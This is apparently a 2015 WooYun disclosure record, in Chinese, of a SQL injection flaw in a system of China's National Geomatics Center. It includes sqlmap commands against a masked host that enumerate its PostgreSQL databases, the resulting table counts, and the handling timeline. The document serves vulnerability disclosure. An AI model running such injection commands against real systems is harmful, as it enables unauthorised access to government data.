漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0142750
漏洞标题:国家基础地理信息中心某系统存在注入漏洞
相关厂商:cncert国家互联网应急中心
漏洞作者: 路人甲
提交时间:2015-09-24 23:17
修复时间:2015-11-13 10:12
公开时间:2015-11-13 10:12
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开
简要描述:
国家基础地理信息中心某系统存在注入漏洞 可泄露国家地理信息
详细说明:
漏洞证明:
root@kali58:~# sqlmap -u "**.**.**.**:8070/News/showPages.aspx?nt=CONTENT_TYPE_2&id=2" --dbs --batch
root@kali58:~# sqlmap -u "**.**.**.**:8070/News/showPages.aspx?nt=CONTENT_TYPE_2&id=2" --current-db --batch
root@kali58:~# sqlmap -u "**.**.**.**:8070/News/showPages.aspx?nt=CONTENT_TYPE_2&id=2" -D pg_catalog --count --batch
Database: pg_catalog
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| pg_largeobject | 190911 |
| pg_depend | 14711 |
| pg_attribute | 12446 |
| pg_largeobject_metadata | 10609 |
| pg_description | 4242 |
| pg_proc | 3837 |
| pg_statistic | 3165 |
| pg_class | 1191 |
| pg_type | 1144 |
| pg_operator | 779 |
| pg_index | 474 |
| pg_amop | 430 |
| pg_attrdef | 373 |
| pg_amproc | 316 |
| pg_ts_config_map | 304 |
| pg_cast | 224 |
| pg_constraint | 222 |
| pg_aggregate | 137 |
| pg_conversion | 132 |
| pg_rewrite | 127 |
| pg_opclass | 126 |
| pg_opfamily | 83 |
| pg_trigger | 45 |
| pg_ts_config | 16 |
| pg_ts_dict | 16 |
| pg_namespace | 9 |
| pg_pltemplate | 8 |
| pg_extension | 7 |
| pg_range | 6 |
| pg_am | 5 |
| pg_ts_template | 5 |
| pg_database | 4 |
| pg_language | 4 |
| pg_collation | 3 |
| pg_shdescription | 3 |
| pg_tablespace | 2 |
| pg_authid | 1 |
| pg_db_role_setting | 1 |
| pg_shdepend | 1 |
| pg_ts_parser | 1 |
+-------------------------+---------+
可跨裤
root@kali58:~# sqlmap -u "**.**.**.**:8070/News/showPages.aspx?nt=CONTENT_TYPE_2&id=2" -D tiger --count --batch
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-09-29 10:11
厂商回复:
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发北京分中心,由其后续尝试协调网站管理单位处置。
最新状态:
暂无